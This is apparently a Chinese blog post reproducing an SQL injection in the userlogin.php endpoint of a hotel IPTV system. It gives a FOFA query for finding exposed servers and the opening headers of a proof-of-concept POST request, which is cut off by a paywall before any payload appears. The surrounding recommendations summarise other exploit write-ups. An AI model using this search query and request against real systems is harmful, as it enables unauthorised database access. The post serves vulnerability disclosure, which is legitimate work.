酒店智慧营销IPTV系统userlogin.php存在sql注入

原创 于 2025-05-26 16:52:59 发布 · 342 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #web安全 #漏洞复现 #漏洞利用 #漏洞库 #渗透测试

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

子辰视讯IPTV系统拥有电信级全业务功能,支持电视直播(IGMP组播模式和HLS单播模式同时)、4K超高清、时移回看、内网视频点播、外网OTT点播、桌面定制、应用推送、字幕广告、挂角广告、用户认证计费和到期提醒等。该系统 userlogin.php存在sql注入,攻击者可利用该问题获取系统信息。

fofa

body="xsiptvp"

poc

POST /xsiptva/cniptv/userlogin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Host: 
Upgrade-Insecure-Re
最低0.47元/天 解锁文章
漏洞复现】金盘图书馆系统-doupload-任意文件上传
知黑而守白
01-25 375
金盘移动图书馆管理系统是集掌上门户,掌上APP,微信平台为一体的移动服务解决方案,在移动智能时代拉近读者与图书馆之间的距离。其存在信息泄露漏洞,泄露管理员账号密码等敏感信息。金盘移动图书馆管理系统 doUpload 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
W&Jsoft-D-Security数据防泄露系统(DLP) sys_ds_logfile_displaylog.jsp 任意文件读取漏洞复现(附脚本)
iSee857的博客
01-06 273
​ W&Jsoft-D-Security数据防泄露系统(DLP) sys_ds_logfile_displaylog.jsp接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
即时通讯聊天程序源码IM聊天系统即时通讯系统源码VUE开发.zip
12-30
前端开发语言:Vue( 安卓,IOS,Web为一套前端代码),服务器端开发语言: PHP+WebSocket,数据库:MySql + Mongodb,前端打包工具:Hbuilder 服务器搭建工具:宝塔 + Xshell。 短信接口: 支持阿里云 支付接口:支持支付宝 服务器配置: 4核8G宽带10兆以上,服务器系统:Linux CentOS 7.6 64位,是否需要域名:需要。 教程开始 开放28018 8383 1236端口 修改mongodb 端口为28018 php安装扩展: fileinfo redis Swoole4 mongodb 删除全部禁用函数 终端命令: /www/wwwroot/im/http/app/im/common/controller/ActionBegin1.php 修改GatwayWork服务地址 /www/wwwroot/im/http/config/database.php 修改数据库信息 /www/wwwroot/im/socket/app/im/common/controller/Main.php 修改数据库信息 /www/wwwroot/im/socket/app/im/common/controller/Config.php 修改IP mongodb安装 cd /www/server cd mongodb cd bin ./mongorestore -h 127.0.0.1:28018 -d im -dir /www/wwwroot/mongodb/im ffmpeg安装 wget http://smiaoshen.oss-cn-hangzhou.aliyuncs.com/im/ffmeg.zip mv ffmeg.zip /opt cd /opt unzip ffmeg.zip 安装yasm wget http://www.tortall.net/projects/yasm/releases/yasm-1.3.0.tar.gz tar -zxvf yasm-1.3.0.tar.gz cd yasm-1.3.0 ./configure make && make install ./configure && make && make install cd ../ cd /opt cd ffmpeg ./configure && make && make install 启动服务 cd cd /www/wwwroot/im/socket php start.php start 下载Hbuilder 前端操作需要设置vue主程序的三个api接口 后台登录用户名:admin 密码:123456 TP伪静态,防跨域关掉
im即时通讯系统preview.php前台任意⽂件上传
最新发布
swordheart的博客
05-20 354
im即时通讯系统preview.php接口存在任意文件上传
[未公开0day]金盘移动图书馆系统-文件上传漏洞
LiangYueSec的博客
06-21 975
[未公开0day]金盘移动图书馆系统-文件上传漏洞
悦库企业网盘 /user/login/.html SQL注入漏洞复现
0xSec
06-13 1552
悦库企业网盘 登录框接口/user/login/.html 处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
华望云会议管理平台 recodemangerForUser.inc SQL注入复现
iSee857的博客
09-18 451
华望云会议管理平台是一款基于云计算技术的远程音视频互动软件,致力于为用户提供便捷、易用、低成本的会议解决方案。该平台拥有丰富的功能和广泛的应用场景,能够满足不同用户在不同场景下的会议需求。系统在 recodemangerForUser.inc 接口中存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。该漏洞需要用到系统权限,因此需要通过/ajax/userlogin获取有效cookie。将响应中的cookie带入到后续请求接口中。
userlogin.rar_Windows编程_PHP_
08-11
总结起来,"userlogin.rar"这个压缩包很可能包含了一个基于PHP的Windows环境下用户权限管理系统,涉及到Windows编程技术和PHPWeb开发应用,如用户登录验证、权限控制等核心功能。开发者可以通过解压并分析其中的...
H3C路由器userLogin.asp信息泄漏洞-类型补充
weixin_45100060的博客
08-06 1176
华三家用路由器配置泄露
金盘移动图书管理系统doUpload.jsp接口存在文件上传漏洞
waxcj的博客
01-26 786
金盘移动图书管理系统doUpload.jsp接口存在文件上传漏洞
iptv鉴权 php,小白的IPTV折腾教程-双网融合/IPTV共享 - OPENWRT专版 - 恩山无线论坛 - Powered by Discuz!...
热门推荐
weixin_29066781的博客
04-13 1万+
转发的是某博客上的文章,大家尝试后,希望给出反馈。本章节要讲的目的:互联网 + iptv 通道双网融合,解决弱电盒到电视机只有一根网线的问题iptv 节目的共享给智能电视、安卓盒移动设备通过 wifi 观看 iptv 节目一、IPTV使用路由器单WAN口验证1、由于各地、各运营商 IPTV 不同,导致 IPTV 的认证模式也不同。比方电信多是 PPPOE 认证获得一个 10/172 开头的内网 ...
IPTV桌面APK源码 网络电视机顶盒APP源码带php后台
模板下载
04-08 5152
介绍: 双IPTV桌面APK源码 网络电视机顶盒APP源码带php后台,后台添加多格式在线直播源,带后台搭建视频教程 网盘下载地址: http://kekewl.net/6DWsDWaII1J 图片:
webuploader 实现图片批量上传功能附实例代码
dxyzhbb的博客
12-20 988
1、导入资源 2、JSP代码 <div class="page-container"> <div class="row cl"> <label class="form-label col-xs-4 col-sm-2"><span class="c-red">*</span>项目名称:</lab...
深入解析webuploader-0.1.5:高效的网页文件上传控件
weixin_36474966的博客
09-11 1850
本文还有配套的精品资源,点击获取 简介:webuploader-0.1.5上传控件是为网页端设计的文件上传组件,提供丰富的功能和定制选项,优化了文件上传的体验。本文将详细介绍其核心特性、工作原理及实际应用方法,包括文件选择、上传进度监控和错误处理等。同时,探讨了不同版本的特定功能和适用场景,以及如何在项目中有效利用该控件的API进行自定义和集成。 1. WebUp...
thinkphp5集成H-ui后台(五)集成webUploader
timbrown1119的专栏
04-08 3276
在所有的编程语言中,都有对文件上传处理的知识点,这里不多赘述。在H-ui中,有一个功能强大的文件上传组件webUploader,今天就来说明和集成一下它。先看一下webUploader集成后的效果:1、页面中使用webUploader这里就以博客的增加页面(blogAdd.html)为例,首先在页面中引入webUploader所需要的css样式和js文件:&lt;link href="__ADMI...
TP5用webuploader实现图片上传
黄啊码
05-27 985
PHP模板解析路径问题 首先,配置文件添加代码 位置:application/config.php return [ 'admin' => '/static/admin', ], 其次,php中读取配置文件 $admin = config('admin'); 或者 $admin = config("view_replace_str.__ADMIN__"); //重点推荐 <script src="$admin/plugins/webuploader-0.1.5/webupl
java web批量上传文件_java webuploader+smartUpload 实现文件批量上传
weixin_42135462的博客
02-13 450
1 (function( $ ){2 //当domReady的时候开始初始化3 $(function() {4 var $wrap = $('.uploader-list-container'),56 //图片容器7 $queue = $( '10 //状态栏,包括进度和控制按钮11 ...
WebUploader使用记录
csdmwinter的博客
12-27 692
WebUploaders使用
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值